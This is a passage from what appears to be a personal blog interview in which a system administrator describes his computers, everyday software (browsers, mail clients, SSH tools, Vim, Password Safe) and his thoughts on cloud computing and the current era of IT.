    Besides that I have one prominent personal toy: Nikon D3100 (because my beloved D40 and 35mm got stolen).

    See what happens when you say it’s stable?!

    And what software?

    Most work nowadays is done in the browser. I used to be big on Firefox but have been a steady Chrome users for ~4 years. Because it’s faster (or feels that way). A lot of our in-house software is webbased (agenda, planning, CRM, mail) so I spend a lot of time in the browser. I also have large MP3 collections that I manage with MediaMonkey or Audicious. But creating playlists on Youtube is actually how I listen to most music now. For plowing trough a lot of (IMAP) mail I use Thunderbird on Windows and Sylpheed on Lubuntu. Thunderbird renders email a bit nicer and has great search features but is heavier. So Sylpheed is (you guessed it!) faster. And moving mail with the keyboard is implemented in the best possible way that I know. Thunderbird with the Nostalagy plugin is alright but not quite the same. But at work I have a mouse/keyboard setup so it is doable. At home with a trackpad that would be un-doable.

    We manage a _lot_ of Debian servers and network devices and use Password Safe for storing passwords and keys (works on both Linux/Windows). We keep the password files in SVN. I use Tortoise SVN because it integrates nicely with the Windows shell. Or on Linux just plain old command line svn(1). We’re moving to 2 factor authentication: so a Yubikey is plugged in to my laptop.

    I use a puTTY fork called kiTTY as my SSH client because it has a couple of nice extra features (duplicate sessions etc.). And on Lubuntu I use LXTerminal.

    On servers the main piece of software I use is probably Vim. I know my way around Vim. But I also know I probably know nothing about Vim even after 10+ years.

    For IM I use Pidgin: one IM client to rule them all (both Linux/Windows). And besides that the following software on Windows: Notepad++, Filezilla, MS Office/LibreOffice and one notable: FSCapture. I also own a mIRC license! (One of the few people I guess.)

    So most times I have four programs running: Chrome, a mail reader (Thunderbird/Sylpheed), SSH clients (kiTTY/LXTerminal), Pidgin.

    Pretty boring huh 🙂

    What would be your dream setup?

    I have two thoughts here.

    1. As you might have guessed by now. I’m all about speed and efficiency (my laptops have black wallpapers.) I don’t like waiting. It breaks focus, it’s inefficient. But I also use pretty old hardware. What that says is the way I use computers hasn’t really changed in 10+ years (or that I’m pretty conservative). But the thing is that adding hardware will not significantly add speed to my workflow. In the 90s every new CPU or piece of RAM would directly improve performance. This is just not the case anymore. Adding a SSD was the only thing to make a difference in the last 8 years. And I only occasionally wish for a multi core i7: e.g. when rendering a movie.

    Also with cloud/browser software and smartphones we’re (again) moving to very smart but still “dumb” terminals (remember the 70s?). It seems we’re heading to a point where you have a single sign-on and everything is is just there. And the device or OS is not an issue (at least that’s what Google would like).

    So I wish for things like: solar powered laptops/tablets/phones (or long, long, long battery life). Cheap, easy, redundant storage: because of digital stress (i.e. my ever growing personal photo and movie collection). But mostly hardware is just a tool. It shouldn’t really matter what tool you use to get the job done.

    2.  Saying my way of ‘desktopping’ hasn’t really changed in some years doesn’t make me less excited about the future. I believe we live in a wonderful time. We’re still at the forefront of the IT revolution (smartphones are just a couple of years old) and I expect great things. A lot of things that will be used in 100 years will be discovered/developed today. And it might not be directly so, but the ideas and dreams will be come from this era. Execution can come later. 

    (I stole this next idea from Paul Graham) Throughout history we’ve seen eras of painters (Rembrandt), classical composers (Mozart, Beethoven) and theatre (Shakespeare). All 3 are fields where most of the innovation was done closely at the start of the revolution. And we have only been reiterating ever since. I believe we are in that era for IT now. And we can all be part of it.